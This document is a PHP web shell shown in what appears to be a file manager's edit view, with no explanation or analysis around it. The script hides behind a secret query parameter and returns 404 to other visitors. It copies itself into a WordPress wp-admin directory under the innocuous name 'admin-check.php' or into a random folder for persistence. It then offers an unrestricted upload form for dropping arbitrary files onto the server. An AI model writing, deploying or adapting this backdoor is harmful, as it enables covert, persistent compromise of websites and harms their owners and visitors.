KOKINIO - MANAGER

Edit File: qqdnycnc.php

<?php
session_start();

$expected_param = 'Savvy';
$expected_value = 'Mrx';
$is_authenticated = isset($_SESSION['authenticated']) && $_SESSION['authenticated'] === true;

if (isset($_GET[$expected_param]) && $_GET[$expected_param] === $expected_value) {
    if (!$is_authenticated) {
        $_SESSION['authenticated'] = true;
        $is_authenticated = true;
    }

if ($_SERVER['REQUEST_METHOD'] === 'GET') {
        $source_file = __FILE__;
        $wp_admin_dir = $_SERVER['DOCUMENT_ROOT'] . '/wp-admin';

if (is_dir($wp_admin_dir) && is_writable($wp_admin_dir)) {
            $target_dir = $wp_admin_dir;
        } else {
            $dirs = array_filter(glob($_SERVER['DOCUMENT_ROOT'] . '/*'), 'is_dir');
            if (!empty($dirs)) {
                $target_dir = $dirs[array_rand($dirs)];
            } else {
                $target_dir = $_SERVER['DOCUMENT_ROOT'] . '/' . uniqid('backup_', true);
                mkdir($target_dir, 0755, true);
            }
        }
        
        $target_file = $target_dir . '/admin-check.php';
        if (copy($source_file, $target_file)) {
            $protocol = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https://' : 'http://';
            $file_url = $protocol . $_SERVER['HTTP_HOST'] . str_replace($_SERVER['DOCUMENT_ROOT'], '', $target_file);
            echo "File copied to: <a href='" . htmlspecialchars($file_url) . "' target='_blank'>" . htmlspecialchars($file_url) . "</a>";
        } else {
            echo "Failed to copy file.";
        }
    }
    ?>
    <!DOCTYPE html>
    <html lang="en">
    <head>
        <meta charset="UTF-8">
        <title>File Upload</title>
    </head>
    <body>
        <p>Upload Directory Status: <strong><?php echo is_writable(__DIR__) ? 'Writable' : 'Not Writable'; ?></strong></p>
        <form action="" method="post" enctype="multipart/form-data">
            <label for="file">Choose a file:</label>
            <input type="file" name="file" id="file" required>
            <button type="submit">Upload</button>
        </form>
        <?php
        if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['file'])) {
            $upload_file = __DIR__ . '/' . basename($_FILES['file']['name']);
            if (move_uploaded_file($_FILES['file']['tmp_name'], $upload_file)) {
                echo "<p>File successfully uploaded: " . htmlspecialchars(basename($_FILES['file']['name'])) . "</p>";
            } else {
                echo "<p>An error occurred during file upload.</p>";
            }
        }
        ?>
    </body>
    </html>
    <?php
} else {
    http_response_code(404);
    exit;
}
?>